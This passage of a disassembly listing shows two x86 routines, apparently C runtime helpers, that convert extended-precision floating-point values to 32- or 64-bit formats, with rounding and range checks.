mov ecx, [eax+6]
mov [ebp+var_20], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
and ebx, 7FFFh
sub ebx, 3FFFh
shl eax, 10h
cmp ebx, 0FFFFC001h
push edi
mov [ebp+var_1C], ecx
mov [ebp+var_18], eax
jnz short loc_4119D3
xor ebx, ebx
xor eax, eax
loc_4119B0: ; CODE XREF: sub_411969+51�j
cmp [ebp+eax*4+var_20], ebx
jnz short loc_4119C3
inc eax
cmp eax, 3
jl short loc_4119B0
xor eax, eax
jmp loc_411E68
; ---------------------------------------------------------------------------
loc_4119C3: ; CODE XREF: sub_411969+4B�j
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
push 2
stosd
pop eax
jmp loc_411E68
; ---------------------------------------------------------------------------
loc_4119D3: ; CODE XREF: sub_411969+41�j
and [ebp+arg_0], 0
push esi
lea esi, [ebp+var_20]
lea edi, [ebp+var_2C]
movsd
movsd
movsd
mov esi, ds:dword_424238
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_10], ebx
mov [ebp+var_C], eax
jns short loc_411A0B
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411A0B: ; CODE XREF: sub_411969+9B�j
lea edi, [ebp+eax*4+var_20]
push 1Fh
xor eax, eax
pop ecx
sub ecx, edx
inc eax
shl eax, cl
mov [ebp+var_8], ecx
test [edi], eax
jz loc_411AB1
mov eax, [ebp+var_C]
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_411A39
; ---------------------------------------------------------------------------
loc_411A34: ; CODE XREF: sub_411969+D6�j
cmp [ebp+eax*4+var_20], 0
loc_411A39: ; CODE XREF: sub_411969+C9�j
jnz short loc_411A43
inc eax
cmp eax, 3
jl short loc_411A34
jmp short loc_411AB1
; ---------------------------------------------------------------------------
loc_411A43: ; CODE XREF: sub_411969:loc_411A39�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_411A5D
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_411A5D: ; CODE XREF: sub_411969+ED�j
and [ebp+var_4], 0
sub ecx, esi
xor edx, edx
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
add esi, edx
mov [ebp+arg_0], esi
mov esi, [ecx]
cmp [ebp+arg_0], esi
jb short loc_411A9C
cmp [ebp+arg_0], edx
jmp short loc_411A9A
; ---------------------------------------------------------------------------
loc_411A7F: ; CODE XREF: sub_411969+143�j
test ecx, ecx
jz short loc_411AAE
and [ebp+var_4], 0
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
cmp esi, edx
mov [ebp+arg_0], esi
jb short loc_411A9C
cmp esi, 1
loc_411A9A: ; CODE XREF: sub_411969+114�j
jnb short loc_411AA3
loc_411A9C: ; CODE XREF: sub_411969+10F�j
; sub_411969+12C�j
mov [ebp+var_4], 1
loc_411AA3: ; CODE XREF: sub_411969:loc_411A9A�j
dec eax
mov edx, [ebp+arg_0]
mov [ecx], edx
mov ecx, [ebp+var_4]
jns short loc_411A7F
loc_411AAE: ; CODE XREF: sub_411969+118�j
mov [ebp+arg_0], ecx
loc_411AB1: ; CODE XREF: sub_411969+B5�j
; sub_411969+D8�j
mov ecx, [ebp+var_8]
or eax, 0FFFFFFFFh
shl eax, cl
and [edi], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_411AD1
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_411AD1: ; CODE XREF: sub_411969+159�j
cmp [ebp+arg_0], 0
jz short loc_411AD8
inc ebx
loc_411AD8: ; CODE XREF: sub_411969+16C�j
mov eax, ds:dword_424234
mov ecx, eax
sub ecx, ds:dword_424238
cmp ebx, ecx
jge short loc_411AF6
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
jmp loc_411D03
; ---------------------------------------------------------------------------
loc_411AF6: ; CODE XREF: sub_411969+17E�j
cmp ebx, eax
jg loc_411D0D
sub eax, [ebp+var_10]
lea esi, [ebp+var_2C]
mov ecx, eax
lea edi, [ebp+var_20]
movsd
cdq
and edx, 1Fh
add eax, edx
movsd
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
movsd
jns short loc_411B24
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411B24: ; CODE XREF: sub_411969+1B4�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_411B3F: ; CODE XREF: sub_411969+201�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_411B3F
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411B79: ; CODE XREF: sub_411969+227�j
cmp edx, eax
jl short loc_411B85
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411B8A
; ---------------------------------------------------------------------------
loc_411B85: ; CODE XREF: sub_411969+212�j
and [ebp+edx*4+var_20], 0
loc_411B8A: ; CODE XREF: sub_411969+21A�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411B79
mov esi, ds:dword_424238
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_C], eax
jns short loc_411BB9
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411BB9: ; CODE XREF: sub_411969+249�j
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
lea ebx, [ebp+eax*4+var_20]
mov [ebp+var_10], ecx
test [ebx], edx
jz loc_411C54
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_411BE4
; ---------------------------------------------------------------------------
loc_411BDF: ; CODE XREF: sub_411969+281�j
cmp [ebp+eax*4+var_20], 0
loc_411BE4: ; CODE XREF: sub_411969+274�j
jnz short loc_411BEE
inc eax
cmp eax, 3
jl short loc_411BDF
jmp short loc_411C54
; ---------------------------------------------------------------------------
loc_411BEE: ; CODE XREF: sub_411969:loc_411BE4�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_411C08
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_411C08: ; CODE XREF: sub_411969+298�j
and [ebp+arg_0], 0
xor edx, edx
sub ecx, esi
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
lea edi, [esi+edx]
cmp edi, esi
jb short loc_411C24
cmp edi, edx
jnb short loc_411C2B
loc_411C24: ; CODE XREF: sub_411969+2B5�j
mov [ebp+arg_0], 1
loc_411C2B: ; CODE XREF: sub_411969+2B9�j
mov [ecx], edi
mov ecx, [ebp+arg_0]
jmp short loc_411C51
; ---------------------------------------------------------------------------
loc_411C32: ; CODE XREF: sub_411969+2E9�j
test ecx, ecx
jz short loc_411C54
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
xor edi, edi
cmp esi, edx
jb short loc_411C4A
cmp esi, 1
jnb short loc_411C4D
loc_411C4A: ; CODE XREF: sub_411969+2DA�j
xor edi, edi
inc edi
loc_411C4D: ; CODE XREF: sub_411969+2DF�j
mov [ecx], esi
mov ecx, edi
loc_411C51: ; CODE XREF: sub_411969+2C7�j
dec eax
jns short loc_411C32
loc_411C54: ; CODE XREF: sub_411969+263�j
; sub_411969+283�j ...
mov ecx, [ebp+var_10]
or eax, 0FFFFFFFFh
shl eax, cl
and [ebx], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_411C74
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_411C74: ; CODE XREF: sub_411969+2FC�j
mov ecx, ds:dword_42423C
inc ecx
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_411C95
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411C95: ; CODE XREF: sub_411969+325�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_411CB0: ; CODE XREF: sub_411969+372�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_411CB0
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411CEA: ; CODE XREF: sub_411969+398�j
cmp edx, eax
jl short loc_411CF6
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411CFB
; ---------------------------------------------------------------------------
loc_411CF6: ; CODE XREF: sub_411969+383�j
and [ebp+edx*4+var_20], 0
loc_411CFB: ; CODE XREF: sub_411969+38B�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411CEA
loc_411D03: ; CODE XREF: sub_411969+188�j
push 2
xor ebx, ebx
pop eax
jmp loc_411E67
; ---------------------------------------------------------------------------
loc_411D0D: ; CODE XREF: sub_411969+18F�j
cmp ebx, ds:dword_424230
mov ecx, ds:dword_42423C
jl loc_411DCC
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
or [ebp+var_20], 80000000h
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_411D48
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411D48: ; CODE XREF: sub_411969+3D8�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_411D63: ; CODE XREF: sub_411969+425�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_411D63
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411D9D: ; CODE XREF: sub_411969+44B�j
cmp edx, eax
jl short loc_411DA9
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411DAE
; ---------------------------------------------------------------------------
loc_411DA9: ; CODE XREF: sub_411969+436�j
and [ebp+edx*4+var_20], 0
loc_411DAE: ; CODE XREF: sub_411969+43E�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411D9D
mov eax, ds:dword_424230
mov ecx, ds:dword_424244
lea ebx, [ecx+eax]
xor eax, eax
inc eax
jmp loc_411E67
; ---------------------------------------------------------------------------
loc_411DCC: ; CODE XREF: sub_411969+3B0�j
mov eax, ds:dword_424244
and [ebp+var_20], 7FFFFFFFh
add ebx, eax
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_411DF4
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411DF4: ; CODE XREF: sub_411969+484�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or esi, 0FFFFFFFFh
mov ecx, edx
shl esi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not esi
loc_411E0F: ; CODE XREF: sub_411969+4D4�j
mov ecx, [ebp+arg_0]
mov edi, [ebp+ecx*4+var_20]
mov ecx, edi
and ecx, esi
mov [ebp+var_10], ecx
mov ecx, edx
shr edi, cl
mov ecx, [ebp+arg_0]
or edi, [ebp+var_C]
mov [ebp+ecx*4+var_20], edi
mov edi, [ebp+var_10]
mov ecx, [ebp+var_4]
shl edi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], edi
jl short loc_411E0F
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411E4C: ; CODE XREF: sub_411969+4FA�j
cmp edx, eax
jl short loc_411E58
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411E5D
; ---------------------------------------------------------------------------
loc_411E58: ; CODE XREF: sub_411969+4E5�j
and [ebp+edx*4+var_20], 0
loc_411E5D: ; CODE XREF: sub_411969+4ED�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411E4C
xor eax, eax
loc_411E67: ; CODE XREF: sub_411969+39F�j
; sub_411969+45E�j
pop esi
loc_411E68: ; CODE XREF: sub_411969+55�j
; sub_411969+65�j
push 1Fh
pop ecx
sub ecx, ds:dword_42423C
shl ebx, cl
mov ecx, [ebp+var_14]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
mov ecx, ds:dword_424240
or ebx, [ebp+var_20]
cmp ecx, 40h
jnz short loc_411E9D
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_411EA7
; ---------------------------------------------------------------------------
loc_411E9D: ; CODE XREF: sub_411969+525�j
cmp ecx, 20h
jnz short loc_411EA7
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_411EA7: ; CODE XREF: sub_411969+532�j
; sub_411969+537�j
pop edi
pop ebx
leave
retn
sub_411969 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411EAB proc near ; CODE XREF: sub_411553+44�p
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
mov ebx, ecx
and ecx, 8000h
mov [ebp+var_14], ecx
mov ecx, [eax+6]
mov [ebp+var_20], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
and ebx, 7FFFh
sub ebx, 3FFFh
shl eax, 10h
cmp ebx, 0FFFFC001h
push edi
mov [ebp+var_1C], ecx
mov [ebp+var_18], eax
jnz short loc_411F15
xor ebx, ebx
xor eax, eax
loc_411EF2: ; CODE XREF: sub_411EAB+51�j
cmp [ebp+eax*4+var_20], ebx
jnz short loc_411F05
inc eax
cmp eax, 3
jl short loc_411EF2
xor eax, eax
jmp loc_4123AA
; ---------------------------------------------------------------------------
loc_411F05: ; CODE XREF: sub_411EAB+4B�j
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
push 2
stosd
pop eax
jmp loc_4123AA
; ---------------------------------------------------------------------------
loc_411F15: ; CODE XREF: sub_411EAB+41�j
and [ebp+arg_0], 0
push esi
lea esi, [ebp+var_20]
lea edi, [ebp+var_2C]
movsd
movsd
movsd
mov esi, ds:dword_424250
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_10], ebx
mov [ebp+var_C], eax
jns short loc_411F4D
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411F4D: ; CODE XREF: sub_411EAB+9B�j
lea edi, [ebp+eax*4+var_20]
push 1Fh
xor eax, eax
pop ecx
sub ecx, edx
inc eax
shl eax, cl
mov [ebp+var_8], ecx
test [edi], eax
jz loc_411FF3
mov eax, [ebp+var_C]
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_411F7B
; ---------------------------------------------------------------------------
loc_411F76: ; CODE XREF: sub_411EAB+D6�j
cmp [ebp+eax*4+var_20], 0
loc_411F7B: ; CODE XREF: sub_411EAB+C9�j
jnz short loc_411F85
inc eax
cmp eax, 3
jl short loc_411F76
jmp short loc_411FF3
; ---------------------------------------------------------------------------
loc_411F85: ; CODE XREF: sub_411EAB:loc_411F7B�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_411F9F
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_411F9F: ; CODE XREF: sub_411EAB+ED�j
and [ebp+var_4], 0
sub ecx, esi
xor edx, edx
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
add esi, edx
mov [ebp+arg_0], esi
mov esi, [ecx]
cmp [ebp+arg_0], esi
jb short loc_411FDE
cmp [ebp+arg_0], edx
jmp short loc_411FDC
; ---------------------------------------------------------------------------
loc_411FC1: ; CODE XREF: sub_411EAB+143�j
test ecx, ecx
jz short loc_411FF0
and [ebp+var_4], 0
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
cmp esi, edx
mov [ebp+arg_0], esi
jb short loc_411FDE
cmp esi, 1
loc_411FDC: ; CODE XREF: sub_411EAB+114�j
jnb short loc_411FE5
loc_411FDE: ; CODE XREF: sub_411EAB+10F�j
; sub_411EAB+12C�j
mov [ebp+var_4], 1
loc_411FE5: ; CODE XREF: sub_411EAB:loc_411FDC�j
dec eax
mov edx, [ebp+arg_0]
mov [ecx], edx
mov ecx, [ebp+var_4]
jns short loc_411FC1
loc_411FF0: ; CODE XREF: sub_411EAB+118�j
mov [ebp+arg_0], ecx
loc_411FF3: ; CODE XREF: sub_411EAB+B5�j
; sub_411EAB+D8�j
mov ecx, [ebp+var_8]
or eax, 0FFFFFFFFh
shl eax, cl
and [edi], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_412013
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_412013: ; CODE XREF: sub_411EAB+159�j
cmp [ebp+arg_0], 0
jz short loc_41201A
inc ebx
loc_41201A: ; CODE XREF: sub_411EAB+16C�j
mov eax, ds:dword_42424C
mov ecx, eax
sub ecx, ds:dword_424250
cmp ebx, ecx
jge short loc_412038
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
jmp loc_412245
; ---------------------------------------------------------------------------
loc_412038: ; CODE XREF: sub_411EAB+17E�j
cmp ebx, eax
jg loc_41224F
sub eax, [ebp+var_10]
lea esi, [ebp+var_2C]
mov ecx, eax
lea edi, [ebp+var_20]
movsd
cdq
and edx, 1Fh
add eax, edx
movsd
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
movsd
jns short loc_412066
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_412066: ; CODE XREF: sub_411EAB+1B4�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_412081: ; CODE XREF: sub_411EAB+201�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_412081
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_4120BB: ; CODE XREF: sub_411EAB+227�j
cmp edx, eax
jl short loc_4120C7
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_4120CC
; ---------------------------------------------------------------------------
loc_4120C7: ; CODE XREF: sub_411EAB+212�j
and [ebp+edx*4+var_20], 0
loc_4120CC: ; CODE XREF: sub_411EAB+21A�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_4120BB
mov esi, ds:dword_424250
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_C], eax
jns short loc_4120FB
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_4120FB: ; CODE XREF: sub_411EAB+249�j
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
lea ebx, [ebp+eax*4+var_20]
mov [ebp+var_10], ecx
test [ebx], edx
jz loc_412196
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_412126
; ---------------------------------------------------------------------------
loc_412121: ; CODE XREF: sub_411EAB+281�j
cmp [ebp+eax*4+var_20], 0
loc_412126: ; CODE XREF: sub_411EAB+274�j
jnz short loc_412130
inc eax
cmp eax, 3
jl short loc_412121
jmp short loc_412196
; ---------------------------------------------------------------------------
loc_412130: ; CODE XREF: sub_411EAB:loc_412126�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_41214A
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_41214A: ; CODE XREF: sub_411EAB+298�j
and [ebp+arg_0], 0
xor edx, edx
sub ecx, esi
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
lea edi, [esi+edx]
cmp edi, esi
jb short loc_412166
cmp edi, edx
jnb short loc_41216D
loc_412166: ; CODE XREF: sub_411EAB+2B5�j
mov [ebp+arg_0], 1
loc_41216D: ; CODE XREF: sub_411EAB+2B9�j
mov [ecx], edi
mov ecx, [ebp+arg_0]
jmp short loc_412193
; ---------------------------------------------------------------------------
loc_412174: ; CODE XREF: sub_411EAB+2E9�j
test ecx, ecx
jz short loc_412196
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
xor edi, edi
cmp esi, edx
jb short loc_41218C
cmp esi, 1
jnb short loc_41218F
loc_41218C: ; CODE XREF: sub_411EAB+2DA�j
xor edi, edi
inc edi
loc_41218F: ; CODE XREF: sub_411EAB+2DF�j
mov [ecx], esi
mov ecx, edi
loc_412193: ; CODE XREF: sub_411EAB+2C7�j
dec eax
jns short loc_412174
loc_412196: ; CODE XREF: sub_411EAB+263�j
; sub_411EAB+283�j ...
mov ecx, [ebp+var_10]
or eax, 0FFFFFFFFh
shl eax, cl
and [ebx], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_4121B6
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_4121B6: ; CODE XREF: sub_411EAB+2FC�j
mov ecx, ds:dword_424254
inc ecx
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_4121D7
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_4121D7: ; CODE XREF: sub_411EAB+325�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_4121F2: ; CODE XREF: sub_411EAB+372�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_4121F2
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_41222C: ; CODE XREF: sub_411EAB+398�j
cmp edx, eax
jl short loc_412238
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_41223D
; ---------------------------------------------------------------------------
loc_412238: ; CODE XREF: sub_411EAB+383�j
and [ebp+edx*4+var_20], 0
loc_41223D: ; CODE XREF: sub_411EAB+38B�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_41222C
loc_412245: ; CODE XREF: sub_411EAB+188�j
push 2
xor ebx, ebx
pop eax
jmp loc_4123A9
; ---------------------------------------------------------------------------
loc_41224F: ; CODE XREF: sub_411EAB+18F�j
cmp ebx, ds:dword_424248
mov ecx, ds:dword_424254
jl loc_41230E
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
or [ebp+var_20], 80000000h
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_41228A
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_41228A: ; CODE XREF: sub_411EAB+3D8�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_4122A5: ; CODE XREF: sub_411EAB+425�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_4122A5
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_4122DF: ; CODE XREF: sub_411EAB+44B�j
cmp edx, eax
jl short loc_4122EB
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_4122F0
; ---------------------------------------------------------------------------
loc_4122EB: ; CODE XREF: sub_411EAB+436�j
and [ebp+edx*4+var_20], 0
loc_4122F0: ; CODE XREF: sub_411EAB+43E�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_4122DF
mov eax, ds:dword_424248
mov ecx, ds:dword_42425C
lea ebx, [ecx+eax]
xor eax, eax
inc eax
jmp loc_4123A9
; ---------------------------------------------------------------------------
loc_41230E: ; CODE XREF: sub_411EAB+3B0�j
mov eax, ds:dword_42425C
and [ebp+var_20], 7FFFFFFFh
add ebx, eax
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_412336
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_412336: ; CODE XREF: sub_411EAB+484�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or esi, 0FFFFFFFFh
mov ecx, edx
shl esi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not esi
loc_412351: ; CODE XREF: sub_411EAB+4D4�j
mov ecx, [ebp+arg_0]
mov edi, [ebp+ecx*4+var_20]
mov ecx, edi
and ecx, esi
mov [ebp+var_10], ecx
mov ecx, edx
shr edi, cl
mov ecx, [ebp+arg_0]
or edi, [ebp+var_C]
mov [ebp+ecx*4+var_20], edi
mov edi, [ebp+var_10]
mov ecx, [ebp+var_4]
shl edi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], edi
jl short loc_412351
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_41238E: ; CODE XREF: sub_411EAB+4FA�j
cmp edx, eax
jl short loc_41239A
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_41239F
; ---------------------------------------------------------------------------
loc_41239A: ; CODE XREF: sub_411EAB+4E5�j
and [ebp+edx*4+var_20], 0
loc_41239F: ; CODE XREF: sub_411EAB+4ED�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_41238E
xor eax, eax
loc_4123A9: ; CODE XREF: sub_411EAB+39F�j
; sub_411EAB+45E�j
pop esi
loc_4123AA: ; CODE XREF: sub_411EAB+55�j
; sub_411EAB+65�j
push 1Fh
pop ecx
sub ecx, ds:dword_424254
shl ebx, cl
mov ecx, [ebp+var_14]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
mov ecx, ds:dword_424258
or ebx, [ebp+var_20]
cmp ecx, 40h
jnz short loc_4123DF
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_4123E9
; ---------------------------------------------------------------------------
loc_4123DF: ; CODE XREF: sub_411EAB+525�j
cmp ecx, 20h
jnz short loc_4123E9
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_4123E9: ; CODE XREF: sub_411EAB+532�j
; sub_411EAB+537�j
pop edi
pop ebx
leave
retn
sub_411EAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
